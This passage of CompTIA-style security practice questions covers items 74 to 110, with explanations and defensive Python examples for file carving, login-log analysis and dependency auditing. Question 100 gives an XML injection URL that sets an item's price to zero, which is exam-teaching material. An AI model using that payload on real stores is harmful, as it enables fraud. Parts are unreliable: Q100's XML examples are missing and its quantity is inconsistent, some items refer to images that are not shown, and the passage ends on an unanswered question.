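            found.append((kind, start, data, hashlib.sha256(data).hexdigest()))
            pos = end
    found.sort(key=lambda f: f[1])
    return found, truncated


# Constructed sample files and a constructed "disk image" built around them.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 40 + b"\xff\xd9"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 20 + b"IEND\xaeB`\x82"
FILLER = bytes(range(256)) * 4          # deterministic slack space; contains no signature


def build_image() -> bytes:
    return (FILLER + JPEG_SAMPLE + FILLER + PNG_SAMPLE + FILLER
            + b"\xff\xd8\xff\xe1" + b"\x11" * 64)     # orphan JPEG header, trailer lost


if __name__ == "__main__":
    found, truncated = carve(build_image())
    for kind, offset, data, digest in found:
        print(f"{kind} at {offset}: {len(data)} bytes sha256={digest[:16]}...")
    print("truncated headers:", truncated)
```

Recording the SHA-256 of each carved object at the moment of recovery is what lets you later prove the evidence has not changed; the same applies to the image the carver was run against.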

74
Q

What problem can be solved by using Wireshark?

Resetting the administrator password on three different servers

Performing packet capture and analysis on a network

Validating the creation dates of webpages on a server

Tracking source code version changes

A

Performing packet capture and analysis on a network

OBJ-2.2: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three options.

75
Q

Your smartphone begins to receive unsolicited messages while you are eating lunch at the restaurant across the street from your office. What might cause this to occur?

Geotagging
Packet Sniffing
Bluejacking
Bluesnarfing

A

Bluejacking

OBJ-1.2: Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as smartphones and tablets. Bluesnarfing, on the other hand, involves taking data from a smartphone or tablet over Bluetooth without permission. Bluetooth has a very limited range, so the attacker is likely within about 10 meters of the victimized device. Geotagging involves embedding geolocation coordinates into a piece of data (normally a photo or video). Packet sniffing is a passive method of collecting network traffic for follow-on analysis at a later time.

76
Q

You want to play computer-based video games from anywhere in the world using your laptop or tablet. You heard about a new product called a Shadow PC that is a virtualized Windows 10 Home gaming PC in the cloud. Which of the following best describes this type of service?

DaaS
SaaS
PaaS
IaaS

A

DaaS

OBJ-3.7: Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based service. This is also known as VDI (Virtual Desktop Infrastructure) and is common in large enterprises that want to improve security and reduce operational expenses. Shadow PC (shadow.tech) provides a version of DaaS for home users who want a gaming PC without the upfront hardware cost.

77
Q

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should be able to obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same Ethernet port in the conference room, they should be able to access Dion Training’s secure internal network. Which of the following technologies would allow you to configure this port and support both requirements?

Configure a SIEM
Create an ACL to allow access
MAC filtering
Implement NAC

A

Implement NAC

OBJ-2.1: Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets, and provide them with access to the secure internal network. NAC could also determine which are unknown machines (assumed to be those of CompTIA employees), and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define what ports, protocols, or IP addresses the ethernet port could be utilized, but it would be unable to distinguish between a Dion Training employee’s laptop and a CompTIA employee’s laptop like a NAC implementation could.

78
Q

Jennifer decided that the licensing cost for a piece of video editing software was too expensive. Instead, she decided to download a keygen program to generate her own license key and install a pirated version of the editing software. After she runs the keygen, a license key is created, but her system performance becomes very sluggish, and her antimalware suite begins to display numerous alerts. Which type of malware might her computer be infected with?

Adware
Trojan
Logic bomb
Worm

A

Trojan

OBJ-1.1: A trojan is a program in which malicious or harmful code is contained inside an apparently harmless program. In this example, the harmless program is the key generator (which does create a license key), but it also has malicious code inside of it (causing the additional alerts from the antimalware solution). Likely, this keygen has an embedded virus or remote access trojan (RAT) in its programming.

79
Q

You want to create a website for your new technical support business. You decide to purchase an on-demand cloud-based server and install Linux, Apache, and WordPress on it to run your website. Which of the following best describes which type of service you have just purchased?

PaaS
SaaS
DaaS
IaaS

A

IaaS

OBJ-3.7: Infrastructure as a Service (IaaS) is focused on moving your servers and computers into the cloud. If you purchase a server in the cloud and then install and manage the operating system and software on it yourself, that is IaaS: the provider is responsible for the hardware, virtualization and network, while you are responsible for patching and securing the OS, Apache and WordPress.

80
Q

Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes this act of vandalism may have been done by the company’s biggest competitor. The decision has been made to contact law enforcement, so evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server’s hard drive as part of her evidence collection. Which technology should Laura use after creating the disk image to verify the data integrity of the copy matches that of the original web server’s hard disk?

AES
RSA
3DES
SHA-256

A

SHA-256

OBJ-5.5: SHA-256 is the Secure Hash Algorithm with a 256-bit output. It is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to verify that a file's data has not been altered: Laura hashes the original drive (read through a write blocker) and the image, and a matching digest demonstrates that the copy is bit-for-bit identical; both values are recorded in the chain-of-custody documentation. RSA, 3DES, and AES are all encryption algorithms. They provide confidentiality, not integrity.

81
Q

You are conducting an incident response and want to determine if any account-based indicators of compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on the server?

Malicious processes
Unauthorized sessions
Off-hours usage
Failed logins

A

Malicious processes

OBJ-2.4: A malicious process is one running on a system that is outside the norm. This is a host-based indicator of compromise (IoC) and is not directly associated with an account-based IoC. Off-hours usage, unauthorized sessions, and failed logins are all account-based examples of an IoC. Off-hours usage occurs when an account is observed logging in during periods outside of normal business hours; attackers often do this to avoid detection during the working day. Unauthorized sessions occur when a device or service is accessed without authorization, for example a limited-privilege user signed in to a domain controller. A failed login might be normal if a user forgets or mistypes their password, but repeated failures for one account could indicate an attacker trying to crack that user's password.
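Two of the three account-based indicators can be pulled straight out of an authentication log. The block below is an added example written for this page (not a SIEM rule from any product) that parses sshd-style syslog lines, raises a finding when one account sees repeated failures from one source within a window, and raises another for successful logons outside business hours or at weekends. The log lines, the 2020 year (syslog timestamps carry none), the threshold, the window and the 08:00 to 18:00 working day are constructed assumptions; "unauthorized sessions" needs an access matrix the log does not contain and is left out.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd lines in syslog format. The year is not in the line and is assumed below.
AUTH = re.compile(
    r"^(?P<ts>[A-Za-z]{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")


def parse_auth(lines, year=2020):
    for line in lines:
        m = AUTH.match(line)
        if m:
            yield (datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
                   m["result"], m["user"], m["ip"])


def account_iocs(lines, fail_threshold=5, window=timedelta(minutes=10),
                 business_hours=(8, 18)):
    """Account-based IoCs only: password guessing (repeated failures for one account
    from one source inside `window`) and successful logons outside business hours or
    at weekends. Host-based signals such as malicious processes are not in this log."""
    failures = defaultdict(list)
    iocs = []
    for ts, result, user, ip in parse_auth(lines):
        if result == "Failed":
            failures[(user, ip)].append(ts)
            recent = [t for t in failures[(user, ip)] if ts - t <= window]
            if len(recent) == fail_threshold:        # fire once, when the threshold is crossed
                iocs.append(("failed_logins", user, ip, ts))
        elif ts.weekday() >= 5 or not (business_hours[0] <= ts.hour < business_hours[1]):
            iocs.append(("off_hours_login", user, ip, ts))
    return iocs


# Constructed sample; 12 Jun 2020 is a Friday.
SAMPLE_AUTH_LOG = [
    "Jun 12 02:10:01 web01 sshd[1201]: Failed password for admin from 10.10.3.2 port 50110 ssh2",
    "Jun 12 02:10:33 web01 sshd[1202]: Failed password for admin from 10.10.3.2 port 50111 ssh2",
    "Jun 12 02:11:04 web01 sshd[1203]: Failed password for admin from 10.10.3.2 port 50112 ssh2",
    "Jun 12 02:11:40 web01 sshd[1204]: Failed password for admin from 10.10.3.2 port 50113 ssh2",
    "Jun 12 02:12:15 web01 sshd[1205]: Failed password for admin from 10.10.3.2 port 50114 ssh2",
    "Jun 12 02:12:50 web01 sshd[1206]: Failed password for admin from 10.10.3.2 port 50115 ssh2",
    "Jun 12 02:14:07 web01 sshd[1207]: Accepted password for admin from 10.10.3.2 port 50116 ssh2",
    "Jun 12 09:05:12 web01 sshd[1340]: Failed password for jason from 10.10.3.50 port 41022 ssh2",
    "Jun 12 09:05:20 web01 sshd[1341]: Accepted publickey for jason from 10.10.3.50 port 41023 ssh2",
    "Jun 12 03:30:00 web01 sshd[1390]: Failed password for invalid user root from 10.10.3.2 port 50200 ssh2",
]


if __name__ == "__main__":
    for kind, user, ip, ts in account_iocs(SAMPLE_AUTH_LOG):
        print(f"{ts:%Y-%m-%d %H:%M:%S} {kind:16} user={user} from={ip}")
```

The sequence that matters is the one the sample contains: a burst of failures for admin at 02:10 followed two minutes later by a successful logon from the same source, which is a guessed password, not a forgetful user. Jason's single typo at 09:05 produces nothing.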

82
Q

You have recently been hired as a security analyst at Dion Training. On your first day, your supervisor begins to explain the way their network is configured, showing you the physical and logical placement of each firewall, IDS sensor, host-based IPS installations, the networked spam filter, and the DMZ. What best describes how these various devices are placed into the network for the highest level of security?

Defense in depth
Network segmentation
Load balancer
UTM

A

Defense in depth

OBJ-3.1: Defense in depth is the concept of layering various network appliances and configurations to create a more secure and defensible architecture. Dion Training appears to be using various host-based and network-based devices to help ensure there are multiple layers of security in the network.

83
Q

Your home network is configured with a long, strong, and complex pre-shared key for its WPA2 encryption. You noticed that your wireless network has been running slow, so you checked the list of “connected clients” and see that “Bob’s Laptop” is connected to it. Bob lives downstairs and is the maintenance man for your apartment building. You know that you never gave Bob your password, but somehow he has figured out how to connect to your wireless network. Which of the following actions should you take to prevent anyone from connecting to your wireless network without the WPA2 password?

Enable WPA
Disable SSID broadcast
Disable WPA2
Disable WPS

A

Disable WPS
OBJ-6.3: WPS was created to ease the setup of new wireless devices by letting the router configure them automatically after a short eight-digit PIN is entered (or a push button is pressed). Unfortunately, the PIN is validated in two halves and its last digit is a checksum, so a brute-force attack needs only about 11,000 guesses instead of 100 million, and WPS is easily compromised. Therefore, WPS should be disabled on all wireless networks. Bob could have brute-forced the PIN from his apartment downstairs or, if he had physical access, pressed the WPS button; either way he joined your network without ever learning the WPA2 passphrase.

84
Q

Users connecting to an SSID appear to be unable to authenticate to the captive portal. Which of the following is the MOST likely cause of the issue?

SSL certificates
CSMA/CA
RADIUS
WPA2 security key

A

RADIUS

OBJ-6.3: Captive portals typically hand the credentials a user types into the web form to a RADIUS server for authentication (the same back end that 802.1X/WPA-Enterprise uses). If the RADIUS server is unreachable or the shared secret between the portal and the server is wrong, every user can still associate to the SSID but none can get past the portal, which matches the symptom described. A WPA2 key problem would stop clients from associating at all, CSMA/CA is the wireless medium-access mechanism and not an authentication component, and an SSL certificate problem would produce browser warnings rather than failed authentication.

85
Q

Using the image provided, place the port numbers in the correct order with their associated protocols:
1701 RDP
3389 L2TP
88 LDAP
389 Kerberos

1701, 3389, 88, 389
88, 389, 3389, 1701
3389, 1701, 389, 88
389, 88, 1701, 3389

A

3389, 1701, 389, 88

OBJ 2.6: For the exam, you need to know your ports and protocols. The Remote Desktop Protocol (RDP) operates over TCP port 3389. Layer 2 Tunneling Protocol (L2TP) operates over UDP port 1701. The Lightweight Directory Access Protocol (LDAP) operates over port 389 (TCP or UDP; LDAP over TLS uses TCP 636). Kerberos operates over port 88 (TCP or UDP).

86
Q

What type of weakness is John the Ripper used to test during a technical assessment?

Usernames
Passwords
Firewall rulesets
File permissions

A

Passwords

OBJ-2.2: John the Ripper is a free, open-source password cracking tool. During a technical assessment it is used to test the strength of passwords by attempting to recover them from captured password hashes; it does not attack a live login prompt. John the Ripper supports dictionary (wordlist) attacks, rule-based mangling of wordlist entries, and brute-force (incremental) attacks.

87
Q

A recent vulnerability scan found several vulnerabilities on an organization’s public-facing IP addresses. In order to reduce the risk of a breach, which of the following vulnerabilities should be prioritized first for remediation?

A website utilizing a self-signed SSL certificate

An HTTP response that reveals an internal IP address

A buffer overflow that is known to allow remote code execution

A cryptographically weak encryption cipher

A

A buffer overflow that is known to allow remote code execution

OBJ-1.6: The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, it must be mitigated first to most effectively prevent a security breach. While the other issues all should be addressed eventually, you need to prioritize the most critical one (remote code execution) on a public-facing IP address. A public-facing IP address means the device is accessible from the internet.

88
Q

You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and causes an impact on the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?

Network mapping
Syslog
NIDS
Firewall logs

A

Syslog

OBJ-2.1: The syslog server is a centralized log management solution. By looking through the logs on the syslog server, the technician could determine which service failed on which server, since all the logs are retained on the syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could assist in determining which server was offline, but not what caused the interruption. Firewall logs would only assist in determining why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.

89
Q

You work as a cybersecurity analyst at a software development firm. The software developers have begun implementing commercial and open source libraries into their codebase so that they can minimize the time it takes to develop and release a new application. Which of the following should be your biggest concern as a cybersecurity analyst?

Open-source libraries are inherently insecure because you do not know who wrote them

There are no concerns with using commercial or open-source libraries to speed up developments

Whether or not the libraries being used in the projects are the most up to date versions

Any security flaws present in the library will also be present in the developed application

A

Any security flaws present in the library will also be present in the developed application

OBJ-3.6: Any security flaw present in a commercial or open-source library will also be present in the application that incorporates it. A library is vulnerable just as any other code might be, and there may be both known (disclosed) and unknown vulnerabilities in the libraries being integrated into the project. The development team therefore needs to inventory which libraries and versions ship in each release (a software bill of materials), monitor those libraries for new CVEs as they are published, plan how to distribute fixes to customers, and plan how to integrate subsequent library updates into the codebase. Open-source libraries are not inherently more insecure than commercially available or in-house libraries; widely used open-source code can benefit from review by many programmers, although that review is no guarantee. While keeping libraries at the latest version is a valid concern, as a cybersecurity analyst you should be more concerned with the security flaws currently present in the library, so that you can conduct risk management, implement controls to mitigate them, and define the process for ongoing updates and patch support.
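The monitoring described above is, at its core, a comparison of pinned library versions against published vulnerable ranges. The block below is an added example written for this page, not a real software-composition-analysis tool: it parses a constructed lock file, checks each pin against a constructed advisory list, and sorts the findings by severity, distinguishing advisories with a fixed release from those where only mitigation is possible. The package names, versions and advisory identifiers are all hypothetical (they are not real CVEs), and the version parser handles plain dotted numbers only.

```python
import re


def parse_version(v: str) -> tuple:
    """Numeric dotted versions only (1.4.2); enough for this demo, not a full PEP 440 parser."""
    return tuple(int(p) for p in v.split("."))


# Hypothetical advisories constructed for this example. Real work pulls these from an
# advisory feed (OSV, GitHub Advisory DB, vendor bulletins); the IDs below are not real CVEs.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-001", "package": "imagetool", "introduced": "1.0.0",
     "fixed": "1.4.2", "severity": "high"},
    {"id": "ADV-EXAMPLE-002", "package": "jsonparse", "introduced": "2.0.0",
     "fixed": None, "severity": "critical"},
    {"id": "ADV-EXAMPLE-003", "package": "imagetool", "introduced": "1.5.0",
     "fixed": "1.5.1", "severity": "low"},
]

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed pinned requirements (the application's lock file).
LOCKFILE = "imagetool==1.3.7\njsonparse==2.1.0\nhttpclient==4.0.1\n"


def parse_lock(text: str) -> dict:
    pins = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z0-9_.-]+)==([0-9.]+)\s*$", line)
        if m:
            pins[m.group(1).lower()] = m.group(2)
    return pins


def is_affected(version: str, adv: dict) -> bool:
    """Affected when introduced <= version and (no fix yet or version < fixed)."""
    v = parse_version(version)
    if v < parse_version(adv["introduced"]):
        return False
    return adv["fixed"] is None or v < parse_version(adv["fixed"])


def audit(lock_text: str, advisories=ADVISORIES) -> list:
    """Findings sorted by severity. A finding whose upgrade_to is None has no fixed
    release yet and needs a mitigation plan rather than a version bump."""
    pins = parse_lock(lock_text)
    findings = []
    for adv in advisories:
        version = pins.get(adv["package"])
        if version and is_affected(version, adv):
            findings.append({"package": adv["package"], "version": version,
                             "advisory": adv["id"], "severity": adv["severity"],
                             "upgrade_to": adv["fixed"]})
    return sorted(findings, key=lambda f: SEVERITY_RANK[f["severity"]])


if __name__ == "__main__":
    for f in audit(LOCKFILE):
        fix = f"upgrade to {f['upgrade_to']}" if f["upgrade_to"] else "no fix available"
        print(f"{f['severity']:8} {f['package']}=={f['version']} {f['advisory']}: {fix}")
```

Running this on every build, and re-running it whenever the advisory feed changes, is the practical form of "monitoring the applicable libraries for additional CVEs"; the unfixed critical finding is the case that forces a risk decision rather than a simple upgrade.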

90
Q

Jason has installed multiple virtual machines on a single physical server. He needs to ensure that the traffic is logically separated between each virtual machine. How can Jason best implement this requirement?

Conduct system partitioning on the physical server to ensure the virtual disk images are on different partitions

Install a virtual firewall and establish an access control list

Create a virtual router and disable the spanning tree protocol

Configure a virtual switch on the physical server and create VLANs

A

Configure a virtual switch on the physical server and create VLANs

OBJ-3.2: A virtual switch is a software application that allows communication between virtual machines. A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. This solution provides logical separation of each virtual machine through the use of VLANs on the virtual switch.

91
Q

Which of the following tools could be used to detect unexpected output from an application being managed or monitored?

A behavior-based analysis tool
A log analysis tool
Manual analysis
A signature-based detection tool

A

A behavior-based analysis tool

OBJ-2.1: A behavior-based analysis tool can be used to capture/analyze normal behavior and then alert when an anomaly occurs. A behavior-based analysis tool requires more effort to set up properly, but it requires less work and manual monitoring once it is running. Signature-based detection is a process where a unique identifier is established about a known threat so that the threat can be identified in the future. Manual analysis requires a person to read all the output and determine if it is erroneous. A log analysis tool would only be useful to analyze the logs, but it would not be able to detect unexpected output by itself. Instead, the log analysis tool would need to use a behavior-based or signature-based detection system.

92
Q

You received an incident response report that indicates a piece of malware was introduced into the company’s network through a remote workstation that was connected to the company’s servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again?

SPF
ACL
NAC
MAC filtering

A

NAC

OBJ-2.1: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then, based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a type of network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forged sender addresses during the delivery of the email.

93
Q

David noticed that port 3389 was open on one of the POS terminals in a store during a scheduled PCI compliance scan. Based on the scan results, what service should he expect to find enabled on this terminal?

RDP
IMAP
MySQL
LDAP

A

RDP

OBJ-2.6: Port 3389 is the port used for the Remote Desktop Protocol (RDP). If this port isn’t supposed to be open, then an incident response plan should be the next step, since this port can be used for remote access by an attacker. MySQL runs on port 3306. LDAP runs on port 389. IMAP over SSL runs on port 993.

94
Q

What is the lowest layer (bottom layer) of a bare-metal virtualization environment?

Guest operating system
Hypervisor
Host operating system
Physical hardware

A

Physical hardware

OBJ-3.7: The bottom layer is physical hardware in this environment. It is what sits beneath the hypervisor and controls access to guest operating systems. The bare-metal approach doesn’t have a host operating system.

95
Q

What is a reverse proxy commonly used for?

To prevent the unauthorized use of cloud services from the local network

Allowing access to a virtual private cloud

Directing traffic to internal services if the contents of the traffic comply with the policy

To obfuscate the origin of a user within a network

A

Directing traffic to internal services if the contents of the traffic comply with the policy

OBJ-2.1: A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users’ devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the response from the server back to the external client. They are not generally intended to obfuscate the source of communication, nor are they necessarily specific to the cloud. A cloud access security broker (CASB) can be used to prevent unauthorized use of cloud services from the local network.

96
Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

SQL injection
Cross-site scripting
CRLF injection
Missing patches

A

Missing patches

OBJ-3.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become a victim of the exploit, and the data contained on the server can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL injection is commonly used against databases, but it is not useful when attacking file servers.

97
Q

Which of the following authentication methods is an open-source solution for single sign-on across organizational boundaries on the web?

Shibboleth
TACACS+
Kerberos
RADIUS

A

Shibboleth

OBJ-4.2: Shibboleth is a standards-based, open-source software package for single sign-on across or within organizational boundaries on the web. It allows sites to make informed authorization decisions for individual access of protected online resources in a privacy-preserving manner. Shibboleth utilizes SAML to provide this federated single sign-on and attribute exchange framework.

98
Q

Jason has created a new password cracking tool using some Python code. When he runs the program, the following output is displayed:

Linux:~ diontraining$ ./CrackPWD.py
Password cracking in progress...
Passwords found for 4 users:
1) jason:rover123
2) tamera:Purple6!
3) sahra:123Password
4) tim:cupcakes2

Based on the output, what type of password cracking method does Jason’s new tool utilize?

Dictionary attack
Brute force attack
Rainbow attack
Hybrid attack

A

Hybrid attack

OBJ-1.2: Based on the passwords found in the example, Jason’s new password cracker is most likely using a hybrid approach. All of the passwords found are dictionary words with some additional characters added to the end. For example, Jason’s password of rover123 is made up of the dictionary word “rover” and the number 123. It is likely that the cracker attempted to use a dictionary word (like rover) and then attempted variations on it using brute force (such as adding 000, 001, 002, …122, 123) to the end of the password until a match was found. Combining the dictionary and brute force methods into a single tool is known as a hybrid password cracking approach.

99
Q

Dion Training has implemented a new mandatory vacation policy to help identify any malicious insiders or employees. Which of the following control types would this policy be categorized?

Managerial
Technical
Operational
Physical

A

Managerial

OBJ-5.7: Managerial or administrative controls are used to determine the way people act. These include policies, procedures, and guidance. Mandatory vacation policies, job rotation policies, and separation of duties policies are great examples of managerial controls.

100
Q

You are analyzing the SIEM for your company’s ecommerce server when you notice the following URL in the logs of your SIEM:

https://www.diontraining.com/add_to_cart.php?itemId=5"+perItemPrice="0.00"+quantity="100"+/>

A

XML injection

OBJ-1.2: This is an example of an XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of an application, and XML injection can cause the insertion of malicious content into resulting messages/documents. In this case, the URL is attempting to modify the server’s XML structure. The original XML structure would be: . By using the URL above, this would be modified to the following: . The result would be that a new line was added to the XML document that could be processed by the server. This line would allow 10 of the product at $0.00 to be added to the shopping cart, while 0 of the product at $50.00 is added to the cart. This defeats the integrity of the e-commerce store’s add to cart functionality through this XML injection. A SQL injection occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. A session hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed through a session token. The real key to answering this question is identifying the XML structured code being entered as part of the URL, which is shown by the bracketed data.

101
Q

Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on?

Blue team
Yellow team
Red team
White team

A

Blue team

OBJ-5.4: Penetration testing can form the basis of functional exercises. One of the best-established means of testing a security system for weaknesses is to play “war game” exercises in which the security personnel split into teams: red, blue, and white. The red team acts as the adversary. The blue team acts as the defenders. The white team acts as the referees and sets the parameters for the exercise. The yellow team is responsible for building tools and architectures in which the exercise will be performed.

102
Q

Chris just downloaded a new third-party email client for his smartphone. When Chris attempts to log in to his email with his username and password, the email client generates an error message stating that “Invalid credentials” were entered. Chris assumes he must have forgotten his password, so he resets his email’s username and password and then reenters them into the email client. Again, Chris receives an “Invalid credentials” error. What is MOST likely causing the “Invalid credentials” error in regard to Chris’s email client?

His email account requires multifactor authentication

His email account is locked out

His email account requires a strong password to be used

His smartphone has full device encryption enabled

A

His email account requires multifactor authentication

OBJ-4.1: If a user or system has configured their email accounts to require two-factor authentication (2FA) or multifactor authentication, then even if they enter their username and password correctly in the third-party email client, they will receive the “Invalid credentials” error message. Some email servers will allow the user to create an Application Specific Password to bypass the multifactor authentication requirement to overcome this, or the user will have to use an email client that supports multifactor authentication.

103
Q

Smurf attack

A

A smurf attack occurs when an attacker sends a ping to a subnet broadcast address and the devices on that subnet reply to the spoofed source IP (the victim server), using up its bandwidth and processing power. This image is a graphical depiction of this type of attack.

104
Q

DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as?

Fuzzer
Fault injector
Decompiler
Static code analyzer

A

Static code analyzer

OBJ-3.6: DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through the use of a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and fault injector are all dynamic analysis tools because they require the program being tested to be run in order to be analyzed.

105
Q

You are installing a new wireless network in your office building and want to ensure it is secure. Which of the following configurations would create the MOST secure wireless network?

WPA and MAC filtering
WEP and TKIP
WPA2 and RC4
WPA2 and AES

A

WPA2 and AES

OBJ-6.3: The most secure wireless network configuration utilizes WPA2 with AES encryption. WPA2 is the most secure wireless encryption standard, as it has replaced both WPA and WEP. AES is an extremely strong encryption algorithm that is used by default in the WPA2 standard.

106
Q

You are analyzing the following network utilization report because you suspect one of the servers has been compromised.

IP Address      Name         Uptime            Historical   Current
192.168.20.2    web01        7D 12H 32M 06S    42.6 GB      44.1 GB
192.168.20.3    webdev02     4D 07H 12M 45S    1.95 GB      2.13 GB
192.168.20.4    dbsvr01      12D 02H 46M 14S   3.15 GB      24.6 GB
192.168.20.5    marketing01  2D 17H 18M 41S    5.2 GB       4.9 GB

Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further?

dbsvr01
marketing01
web01
webdev02

A

dbsvr01

OBJ-2.3: Due to the very large increase in network utilization on dbsvr01, it should be suspected of compromise and be investigated further. The server has a historical average utilization of only 3.15 GB per month, but this month there has been an increase to 24.6 GB of usage. This increase is nearly 8x more than the previous month when all of the other servers stayed relatively constant. This is indicative of a possible compromise of the database server (dbsvr01) and a data breach or data exfiltration.

107
Q

The digital certificate on the Dion Training web server is about to expire. Which of the following should Jason submit to the CA in order to renew the server’s certificate?

CRL
CSR
Key escrow
OCSP

A

CSR

OBJ-6.4: A CSR (certificate signing request) is what is submitted to the CA (certificate authority) to request a digital certificate. Key escrow stores keys, a CRL is a list of revoked certificates, and OCSP returns the status of a certificate, such as good, revoked, or unknown.

108
Q

Your company has just finished replacing all of its computers with brand new workstations. Colleen, one of your coworkers, has asked the owner of the company if she can have the old computers that are about to be thrown away. Colleen would like to refurbish the old computers by reinstalling a new operating system and donate them to a local community center for disadvantaged children in the neighborhood. The owner thinks this is a great idea but is concerned that the private and sensitive corporate data on the old computer’s hard drives might be placed at risk of exposure. You have been asked to choose the best solution to sanitize or destroy the data while ensuring the computers will still be usable by the community center. What type of data destruction or sanitization method do you recommend?

Shredding
Purging
Wiping
Degaussing

A

Wiping

OBJ-5.7: Data wiping or clearing occurs by using a software tool to overwrite the data on a hard drive in an effort to destroy all electronic data on a hard disk or other media. Data wiping may be performed with a 1x, 7x, or 35x overwriting, with a higher number of times being more secure. This allows the hard drive to remain functional and allows for hardware reuse. Degaussing a hard drive involves demagnetizing a hard drive to erase its stored data. You cannot reuse a hard drive once it has been degaussed. Therefore, it is a bad solution for this scenario. Purging involves the removal of sensitive data from a hard drive using the device’s own electronics or an outside source (like a degausser). A purged device is generally not reusable. Shredding involves physical destruction of the hard drive. This is a secure method of destruction but doesn’t allow for device reuse.

109
Q

Which of the following type of threats did the Stuxnet attack rely on to cross an airgap between a business and an industrial control system network?

Directory traversal
Removable media
Session hijacking
Cross-site scripting

A

Removable media

OBJ-3.5: Airgaps are designed to remove connections between two networks in order to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

110
Q

You are setting up the Remote Desktop Services on a Windows 2019 server. In order to increase the security of the server, which TWO of the following actions should you take?

Block all unused ports on the switch, router, and firewall

Logically place the Windows 2019 server into the network’s DMZ

Disable log on time restrictions on the server

Change the default access port for the terminal server

Enforce password complexity on the server

